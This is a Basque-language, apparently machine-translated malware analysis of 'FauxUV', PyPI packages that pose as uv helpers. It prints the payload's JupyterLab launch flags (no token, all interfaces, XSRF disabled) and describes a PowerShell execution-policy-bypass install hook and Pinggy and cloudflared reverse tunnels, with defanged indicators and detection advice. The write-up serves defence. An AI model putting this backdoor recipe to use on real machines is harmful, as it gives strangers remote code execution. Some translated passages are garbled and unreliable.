TL; DR
PyPI pakete multzo batek izena hartu zuen uv, Rust-en oinarritutako Python pakete kudeatzaile azkarra eta oso ezaguna, uv laguntzaile gisa aurkezten dira. Ia ez dute benetako funtzionalitaterik eskaintzen. Horren ordez, Windows karga bat daramate, eusten diona... JupyterLab zerbitzaria autentifikazioa itzalita duela eta, bertsio berriagoetan, alderantzizko tunel baten bidez Interneteko publikoan argitaratzen du.
Hori da istorio osoa lerro bakarrean: tresna fidagarri baten izena amu gisa, eta JupyterLab urruneko kodea exekutatzeko motor gisa. Jupyter zerbitzari batek not batean idazten duzun edozein kode exekutatzen du.ebook zelula; token huts batekin abiarazitakoa eta sareko interfaze guztietara lotuta dagoena portura irits daitekeen edonork gidatu dezakeen interprete irekia da.
Klusterra honela jarraitzen dugu FauxUVAztertutako bi paketeak hauek dira moon-uv (0.0.1 – 0.0.16) eta my-magic-uv-helper (0.0.1), operadore berak argitaratua eta analisi unean PyPI-n martxan dagoena.
| ekosistema | PyPI |
| Paketeak | moon-uv (0.0.1-0.0.16), my-magic-uv-helper (0.0.1) |
| Plataforma helburu | Windows |
| Oinarrizko portaera | JupyterLab zerbitzari autentifikatu gabea, alderantzizko tunel baten bidez interneten argitaratua |
| Tresna legitimoak gaizki erabili dira | uv, JupyterLab, cloudflared, Pinggy |
Amua: dagoeneko konfiantza duzun izen bat
uv azken bi urteotan gehien instalatu den Python tresnetako bat da, beraz, "laguntzaile bat" uv"garatzaile batek bigarren pentsamendurik gabe instalatzen duen paketea da. FauxUV-ek bere sinesgarritasuna izen horretan jartzen du erabat. Paketeek biltzen dute benetako uv Astral-eko instalatzailea — kargako URLak benetako ostalari entzutetsuetara bideratzen dituzte — beraz, begirada azkar batek erreferentzia fidagarriak baino ez ditu ikusten. Paketeek ez dute benetan gehitzen uv funtzionaltasuna; izena da mozorro osoa.
JupyterLab RCE motor gisa
Kargaren erdigunea JupyterLab abiarazten duen abiarazle bat da, babes-hesi guztiak kenduta:
jupyter server --with jupyterlab --ip=0.0.0.0 # listen on every interface --ServerApp.token="" # no password, no token --allow_origin='*' # accept cross-origin connections --disable_check_xsrf # allow a remote browser/WebSocket to drive it Bandera bakoitzak babes bat kentzen du, eta bidalitako gidoiak ere oharrak egiten ditu (jatorrizko txineraz): token hutsa "Pasahitz eta token egiaztapenak desaktibatzen ditu — edonork konekta daiteke." jupyter laborategia datu-zientziarako IDE zilegi bat da, baina ez daebook gelaxkak kode arbitrarioa exekutatzen du diseinuz. Horrela konfiguratuta eta lotuta 0.0.0.0, IDE izateari uzten dio eta ostalariaren urruneko shell autentifikatu gabe bihurtzen da — ez da malware bitar pertsonalizaturik behar, bide okerrean zuzendutako tresna nagusi bat besterik ez.
Bi pieza euskarrik hori eskuragarri eta errepikagarria egiten dute:
- Instalazio isilaren abiarazle bat. Lehen bertsioek PowerShell exekutatzen dute -Exekuzio-politikaren saihesbidea zuzenean konfigurazioa.py on pip instalatu, atzeko planoan erroreak ezabatuta, beraz PIP normala dirudi. Bertsio berriek primitibo bera mugitzen dute pip-uv komando-lerroko tresna — eta instalazio-garaiko auto-exekuzioa erabat kendu.
- Alderantzizko tunel publikoa. Zerbitzari bat piztuta 0.0.0.0 makinara bidea egin dezaketen ostalarien bidez bakarrik lor daiteke oraindik. Multzo batek [Pinggy]( bat irekitzen duhttps://pinggy.io/) SSH alderantzizko tunela, Jupyter portu lokala helbide publiko batera birbidaltzen duena, muga hori kenduz. Bidalitako scriptak Cloudflare-ren bide alternatibo bat ere badu —komentatua— hodei-argia eta a netsh port-proxy bat Linode IP batera, helburu bera azpiegitura desberdinen bidez dokumentatuz.
Elkartuta: instalatu paketea, eta Windows ostalari batek pasahitzik gabeko JupyterLab bat exekutatzen eta Interneten argitaratzen amaitzen du.
Nola eboluzionatu zuen FauxUV-ak
FauxUV-en bertsioak bata bestearen atzetik bidali ziren, eta kargaren abiarazte-puntua haien gainetik mugitu zen — gogorarazten du markatutako bertsio batek gutxitan kontatzen duela pakete-lerro baten istorio osoa.
| Praktikak | Bertsioak | trigger | Zer gehitzen duen |
|---|---|---|---|
| Instalazio-amua | moon-uv 0.0.1-0.0.3, my-magic-uv-helper 0.0.1 | setup.py pip instalazioan | uv instalazioa + PATH aurretik jarri |
| CLI exekuzio-denbora | moon-uv 0.0.5-0.0.13 | pip-uv komandoa | pasahitzik gabeko JupyterLab abiarazlea |
| Tunela | moon-uv 0.0.14-0.0.16 | pip-uv komandoa | Pinggy alderantzizko tunel aktibo bat |
Azpimarratzekoa da instalazio-garaian auto-exekuzioa izan zela kendu bertsio berriagoetan, gaiagoetan — beraz, eskaner bat bizi-zikloan bakarrik tekleatzen zen hooks bertsio berrienak honela puntuatuko lituzke gutxiago arriskutsua, alderantziz, hain zuzen ere.
Konpromisoaren adierazleak
Paketearen iturburua irakurriz baieztatuta; amaiera-puntuak markatuta iruzkindu fitxategietan daude baina aztertutako bertsioak ez ditu exekutatzen. Sareko adierazleak desaktibatuta daude.
| Mota | Adierazlea |
|---|---|
| Instalatu komandoa | powershell -ExecutionPolicy Bypass benetako uv instalatzailea eskuratzen, pip instalazio unean |
| JupyterLab banderak | --ip=0.0.0.0 --ServerApp.token="" --allow_origin='*' --disable_check_xsrf |
| Alderantzizko tunela (aktibo) | free[.]pinggy[.]io:443 tokiko birbidaltzea 127.0.0.1:8888 |
| Tunelaren ostalaria (komentatua) | cloudflared tunnel --url hxxp://127[.]0[.]0[.]1:2718 |
| IP (komentatua) | 45[.]79[.]134[.]161 (Linode) bidez netsh port-proxy |
| Iraunkortasuna | aurretik jartzen da %USERPROFILE%\.local\bin erabiltzailearen BIDEA |
Ohartarazi beharreko portaera-seinaleak, kate zehatz hauetatik independenteki: a pip instalatu sortzen dena. powershell -ExekuzioPolitika Saihestuedozein Jupiter abiaraztea konbinatzea tokena=”” batera –ip=0.0.0.0; eta irteerako SSH honetara *.pinggy.io garatzaile edo CI makina batetik.
Behatutako portaera eta jatorria
Bi paketeek egile eta metodo bat partekatzen dute: tresna fidagarri baten izena, Windows-erako soilik defentsa, erroreak kentzen dituen atzeko planoan exekuzioa eta tresna entzutetsuetan oinarritzea, beraz, begirada azkar batek URL entzutetsuak baino ez ditu ikusten. Iturriak segurtasunarekin lotutako banderak argi eta garbi deskribatzen dituzten txinerazko iruzkinak ditu; horiek fitxategian beha daitezkeen adierazpen gisa jakinarazten ditugu, ez motiboari buruzko baieztapen gisa. jatorri_baimendu balioa eta bat lankidetza.bat fitxategi-izenak Google Colab-erako erabiltzen diren "nire tokiko exekuzio-denbora partekatu" lan-fluxu informalak islatzen ditu. Jatorria edozein dela ere, paketatutako emaitza berdina da.
Eragina eta defendatzaileentzako orientabideak
Nor dago FauxUV-ren eraginpean? Windows garatzaileak eta CI exekutatzen dutenak pip instalatu pakete hauetako bat. JupyterLab pasahitzik gabeko bat 0.0.0.0 Portua irits daitekeen edonorentzat urruneko kodea exekutatzea da; tunelak "nork irits daitekeen" muga kentzen du. Zerbitzaria instalatzaile gisa exekutatzen da, erabiltzaile horren fitxategiak, tokenak eta hodeiko kredentzialak heredatuz.
Zergatik den erraza galtzea. Sare-kate guztiek ostalari entzutetsu batera seinalatzen dute — Astral, JupyterLab, hodei-argia, Pinggy, Colab. Ez dago hash egiteko malware bitarrik eta ez dago deskodifikatzeko blob nahasirik. Ospearen eta sinaduraren araberako eskaneatzeak garrantzi gutxi ematen dio horri, eta horregatik portaeraren galdera — Zer egiten du makinak pakete hau instalatzeak? — da harrapatzen duena.
Orientazio:
- Tratatu edozein instalazio-denbora powershell -ExekuzioPolitika Saihestu eraikuntza-haustura seinale gisa, lortzen duen URLa edozein dela ere.
- Alerta aktibatuta Jupiter token huts batekin abiarazi zen eta –ip=0.0.0.0; konbinazio hori ez da inoiz agertu behar lan-estazio edo exekutatzaile batean.
- Tunel hornitzaileetara SSH irteerako monitorizazioa (*.pinggy.io, *.trycloudflare.com) garatzaile eta CI inguruneetatik.
- Instalatu uv [iturri ofizialetik](https://docs.astral.sh/uv/) eta eszeptikoa izan instalatzeko erraza den tresna bat biltzen duten hirugarrenen "laguntzaile" paketeekiko.
- Mendekotasunak eguneratutakoan finkatu eta berriro berrikusi — pakete-lerro batek bertsioz bertsio gaitasun berriak haz ditzake.



